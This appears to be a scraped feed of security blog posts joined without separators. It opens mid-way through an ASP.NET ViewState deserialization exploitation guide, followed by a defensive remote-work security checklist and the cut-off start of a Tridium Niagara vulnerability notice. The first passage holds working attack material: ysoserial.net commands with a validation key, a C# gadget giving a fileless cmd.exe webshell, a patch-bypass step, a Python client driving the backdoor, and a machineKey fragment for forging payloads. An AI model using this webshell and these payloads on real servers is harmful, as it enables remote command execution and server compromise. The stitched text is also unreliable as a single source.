We only need to change the -g argument to ActivitySurrogateSelectorFromFile; the -c argument is then no longer a system command but the ExploitClass.cs C# source file we want to execute, followed by the dlls it depends on, separated by ; semicolons.

ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile
              -c "ExploitClass.cs;./dlls/System.dll;./dlls/System.Web.dll"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

The dlls to reference can be found on a Windows host with the .NET Framework installed; in my environment they are under the path C:\Windows\Microsoft.NET\Framework64\v4.0.30319.

As for the crucial ExploitClass.cs, how should it be written? I will try to submit it to ysoserial.net, so you may find it among the example files later, or you can just look at it here first:

class E
{
    public E()
    {
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            string cmd = context.Request.Form["cmd"];
            process.StartInfo.Arguments = "/c " + cmd;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.UseShellExecute = false;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            context.Response.Write(output);
        } catch (System.Exception) {}
        context.Response.Flush();
        context.Response.End();
    }
}

Both Server.ClearError() and Response.End() are necessary and important steps. An abnormal VIEWSTATE inevitably makes the aspx page respond with a 500 or some other unexpected Server Error. Calling the first function clears the errors recorded on the stack in the current runtime, while calling End() makes ASP.NET mark the current context as a completed request and return the response directly to the client, preventing the program from moving on into other error handlers and losing the output of the executed command.

At this point, in theory, as long as you always attach this malicious VIEWSTATE when sending requests, you can work with it just like an ordinary WebShell:
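As an illustration of driving the fileless backdoor, here is a minimal client-side sketch in Python. The `cmd` field name matches the `Request.Form["cmd"]` read in ExploitClass.cs above; the VIEWSTATE value is whatever ysoserial.exe printed, and the target URL is hypothetical:

```python
import urllib.parse

def build_payload(viewstate_b64, cmd):
    # Package the forged VIEWSTATE together with the command for the
    # backdoor; "cmd" matches the form field read by ExploitClass.cs.
    return urllib.parse.urlencode({
        "__VIEWSTATE": viewstate_b64,
        "cmd": cmd,
    })

body = build_payload("<base64 from ysoserial>", "whoami")
# POST 'body' to the target .aspx page with
# Content-Type: application/x-www-form-urlencoded, e.g.:
#   curl -d "$body" https://target/page.aspx
```

In practice you would also carry along any other form fields (such as `__VIEWSTATEGENERATOR`) observed in a legitimate response from the page.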

Sometimes, though, you will run into this situation:

No matter how you modify the payload and resend it, you always get a Server Error, and you start questioning your life Q_Q

But don't lose heart just yet; it may simply be that the target you hit has dutifully kept its servers patched. Microsoft shipped patches against the ActivitySurrogateSelector gadget that prevent direct exploitation; fortunately, another researcher quickly provided a workaround that makes this gadget exploitable again!

For the details, read this article: Re-Animating ActivitySurrogateSelector by Nick Landers

In short, if you run into the situation above, first try generating a VIEWSTATE with the following command and sending it to the server once. If it works, the DisableActivitySurrogateSelectorTypeCheck variable in the target runtime will be set to true, and ActivitySurrogateSelector gadgets sent afterwards will no longer blow up with a 500 Server Error.

ysoserial.exe -p ViewState -g ActivitySurrogateDisableTypeCheck
              -c "ignore"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

If everything above goes smoothly and you can execute system commands and get the results back, that is basically enough to do most things; for the rest, keep letting your imagination run free!

That said, sometimes even at this stage there are unexplained errors and, for unknown reasons, the MAC computation keeps coming out wrong. The combination of .NET's internal algorithms and the required environment parameters is complicated enough that the tool cannot easily cover every possible case. When I hit this situation, the solution I currently choose is manual labor: build the same environment locally, configure the same MachineKey, hand-write an aspx file, generate the VIEWSTATE containing the gadget, and then relay it to the target host. If you have other findings or different ideas you are willing to share, you are welcome to come chat with me.
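For the local-reproduction approach, the key step is giving your test site the same key material in web.config. A sketch of the relevant fragment (the validationKey is the example value used in the commands above; the decryptionKey and algorithm choices are placeholders you would copy from the target):

```xml
<system.web>
  <!-- Match the target's machineKey so generated VIEWSTATEs validate there -->
  <machineKey validationKey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"
              decryptionKey="YOUR-DECRYPTION-KEY-HERE"
              validation="SHA1"
              decryption="AES" />
</system.web>
```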

Security Considerations for Remote Work

3 March 2020 at 16:00

Due to the recent impact of the novel coronavirus (COVID-19), many companies have allowed employees to telework or work from home (WFH). As the epidemic accelerates, opening remote work across the board without thorough preparation risks running into security issues that have not yet been considered. This article provides a simple guide to what to watch out for when working remotely from home, discussed from two perspectives: company management and the individual user.

If you just want the highlights, skip to the final section, TL;DR.

Attack Techniques

Let's first talk about attack techniques. Consider the following attack scenarios, all of which we have used during red team engagements, and which may equally be blind spots for companies.

  1. Scenario 1, VPN credential stuffing: Employee A connects to the corporate intranet over VPN, but the VPN account uses A's habitual username and password, reused across other non-company services (such as Facebook and Adobe), and this password was leaked long ago in several breaches. The attack team targets employee A and logs into the company with this password. Regrettably, the VPN is not strictly segmented from the internal network, so the attackers directly reach the internal employee portal and obtain all kinds of sensitive data.
  2. Scenario 2, VPN vulnerabilities: VPN vulnerabilities have become a primary target for attackers. Company B's VPN server contains a vulnerability; after taking control of the VPN server through it, the attack team uses the management console to configure a client-side logon script that executes malware when employees log in, gaining control of their computers and obtaining confidential company documents. See Orange & Meh's earlier research: https://www.youtube.com/watch?v=v7JUMb70ON4
  3. Scenario 3, man-in-the-middle attack: Employee C works from home over a PPTP VPN. Unfortunately, the computer used by C's child has pirated software containing malware installed. Through that computer, the attacker performs a man-in-the-middle (MITM) attack on the local network, hijacks C's traffic, cracks the VPN credentials, and successfully enters the corporate intranet.

These are just a few of the more common scenarios. Attack teams have a very broad set of options, while it is hard for corporate defenses to be watertight. That is why we wrote this article: we hope it helps companies maintain basic security during this period of remote work.

What Are the Risks?

Risk refers to the potential harm an event can cause to an entity. Causing harm through the techniques introduced above is not difficult for an attacker. Next, we list some factors in a company's security posture that remote work can greatly amplify, increasing an attacker's chance of success:

  • Complex environments: the company cannot control home or remote work environments, which are more complex and dangerous. Internal management and monitoring mechanisms are hard to apply there, and it is difficult to require employees to install monitoring agents on private devices at home.
  • Leakage or misuse of company data: if company data is leaked or misused, the losses can be severe.
  • Lost or stolen devices: whether a laptop, phone, or other device, loss or theft carries a risk of data leakage.
  • Authorization and access control are hard to implement: providing external access for a large number of employees on short notice inevitably forces a trade-off between availability and security.

If the company allows employees to connect to the corporate VPN from personal devices, the issues are equivalent to BYOD (Bring Your Own Device), and plenty of references cover those security concerns, for example NIST SP 800-46, Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-46r2.pdf

Company Perspective

Next, let's look at what companies can do about security for remote work.

Workflow and Policy Planning

  • Workflow adjustments: how each process should be adapted for remote work, e.g. how to collaborate across locations, consolidate work materials, and verify deliverables and their quality.
  • Data inventory: which data lives in the cloud, on servers, or on personal computers; which data becomes inaccessible when working remotely, or where it should be moved.
  • Meeting procedures: select and test video conferencing hardware and software, and check whether the conferencing software encrypts its communications. Expect situations such as longer meetings, people speaking at the same time, and connection quality affecting the meeting.
  • Incident response team and process: for security incidents that occur during remote work, who is responsible for handling them, how they are handled, and how losses are assessed.
  • Need-to-know and least privilege: follow the need-to-know basis and the principle of least privilege (PoLP), granting each employee only the minimum data and permissions needed, to avoid additional security problems.

Network Management

  • VPN account requests and inventory: which employees need VPN access and which groups they belong to, with different permissions and connectivity scope per group.
  • VPN permission scope and internal network segmentation: a VPN connection should not be able to reach every host on the corporate intranet. VPN connections should be treated as external and thus higher risk, so segmented access control is all the more necessary.
  • Monitor VPN traffic and behavior: use internal network traffic monitoring to check VPN usage for anomalous behavior.
  • Only allow allowlisted devices to obtain IP addresses: only registered devices should receive internal IP addresses, keeping suspicious devices off the internal network.
  • Enable multi-factor authentication: turn on MFA for cloud services, VPN, and internal network services.
  • Check that the VPN server is up to date: our past research found that VPN servers are themselves attack targets, so watch closely for updates and patches.

The VPN setup and rollout deserve special mention. Recently we have heard quite a few executives mention that, because of the epidemic, employees who previously had no VPN access have now all been granted it. Yet when asked about monitoring and segmentation once a VPN connection reaches the internal network, few companies have such plans. The internal network is a major security battleground for a company; when you open up VPN access, you must think through the corresponding security measures.

User Perspective

With the company ready, next comes user security. Beyond the VPN links, architecture, and mechanisms the company provides, the user's own security awareness, discipline, and security settings matter just as much.

Confidentiality

  • Dedicated machine for work: a computer used to access company networks or data should be strictly reserved for that purpose; never use the device for non-work activities, and do not let people outside the company use or operate it.

Devices

  • Enable device locating, locking, and wiping: for portable devices, plan thoroughly for loss, e.g. how to locate the device, how to lock it, and how to remotely wipe a lost device to prevent data leakage. Mainstream operating systems mostly provide these mechanisms.
  • Device login password: require a password at login to keep outsiders from operating the device directly.
  • Full-disk encryption: if a lost device is analyzed, full-disk encryption lowers the risk of data being extracted.
  • (Optional) MDM (Mobile Device Management): if the company has deployed MDM, it can assist with the management above.

Credential Security

  • Use a password manager and set "strong passwords": consider using a password manager and generating fully random passwords composed of letters, digits, and symbols.
  • Use a different password per system: as mentioned in many talks, use a unique password for each system to prevent credential stuffing.
  • Enable 2FA / MFA: if a system supports 2FA / MFA, be sure to turn it on for an extra layer of account protection.
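To illustrate the "fully random password with letters, digits, and symbols" recommendation, here is a minimal sketch using Python's secrets module (the length and the particular symbol set are my own arbitrary choices, not part of the original checklist):

```python
import secrets
import string

# Letters + digits + a symbol set; secrets uses a CSPRNG,
# unlike the random module, so it is suitable for passwords.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"

def generate_password(length=20):
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

pw = generate_password()
```

A password manager does the same job with less friction, but this shows the idea: uniform random selection from a large alphabet, not a word with digits bolted on.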

Network Usage

  • Avoid connecting to the company network over public Wi-Fi: public shared networks are quite dangerous and may be sniffed or tampered with. If necessary, use a phone hotspot or reach the internet through a VPN.
  • Never log into company systems from public computers: it is hard to guarantee that public computers are free of backdoors, keyloggers, and similar malware, so logging into any system from them must be forbidden.
  • Verify the device obtains an internal IP address: confirm the internal IP address is correct and internal company systems are reachable.
  • Verify your external IP address: confirm the IP address you use to reach the internet is as expected. This matters especially for security service companies: connecting to a customer from the wrong IP address can cause very serious damage.
  • (Optional) Install a personal firewall: a personal firewall provides basic monitoring for suspicious programs trying to connect out.
  • (Optional) Use E2EE messaging tools: companies commonly use cloud messaging software; prefer tools with E2EE (End-to-End Encryption), so sensitive internal communications can only be decrypted by insiders, with not even the platform vendor able to access them.
  • (Optional) Turn off unnecessary connectivity while working (such as Bluetooth): some security experts recommend disabling all non-essential connectivity on the computer while working, such as Bluetooth; in public environments, a determined attacker might compromise personal devices through a Bluetooth exploit.

Data Management

  • Keep data only on company devices: sensitive company data and documents must be stored only on company devices, to avoid leakage and management problems.
  • Audit records: record where sensitive data is stored, modifications to it, and its owners.
  • Encrypt important documents: important documents must be encrypted, and the password must not be stored in the same directory.
  • Encrypt email attachments and pass the password through a separate channel: besides encrypting attachments, the password must travel through another channel, e.g. told in person, agreed in advance, sent over an E2EE channel, or delivered by non-network means.
  • Back up data: sensitive data must be backed up; you can follow the "3-2-1 Backup Strategy": three copies, two types of media, one stored off-site.

Physical Security

  • Lock the screen the moment you leave the computer: make it a habit to trigger the screensaver and lock immediately when stepping away. Quite a few people let the machine lock itself after a timeout, but in that window an attacker can already finish the job.
  • Never plug in USB drives or devices of unknown origin: one social engineering technique is getting employees to plug in a malicious USB device, which can even destroy the computer (BadUSB, USB Killer).
  • Watch for people peeking at your screen or touching your devices: if you often work in public spaces, consider buying a privacy screen filter.
  • Do not leave computer equipment in your car: although public safety in Taiwan is decent, plenty of laptops are stolen from cars; keep important assets with you or store them out of sight.
  • Close or lock your work area: if you have your own work area, close or lock its door to buy more time to react to an incident.

TL;DR: Don't Neglect Information Security While Fighting the Epidemic!

Network attack and defense is a war. If you do not think about defensive strategy from the attacker's perspective, not only will you fail to mitigate attacks effectively, but with the global epidemic gradually spinning out of control, you may let malicious actors use the moment to attack companies working remotely. We hope our experience gives companies some basic guidance, and that these disasters subside soon. Stay strong, Taiwan!

  • Before opening up VPN services, mind account management and internal network segmentation, so that the VPN cannot reach arbitrary internal hosts.
  • Always use unique, long passwords for cloud and network services, and enable MFA / 2FA multi-factor authentication.
  • When using cloud services, inventory access permissions to keep document links from being accessible to anyone.
  • Watch physical security issues such as device loss, theft, and social engineering.
  • The network is dangerous: use trustworthy networks and encrypt communications and transfers.

Tridium Niagara Vulnerabilities

By: JW
5 January 2020 at 20:00
**If you’ve been contacted by me, it is because your device is on the internet and may be vulnerable to the vulnerabilities identified below. Please read through this and contact me if you have questions. Thanks**

What is Tridium Niagara? Tridium is the developer of the Niagara Framework. The Niagara Framework is a universal software infrastructure...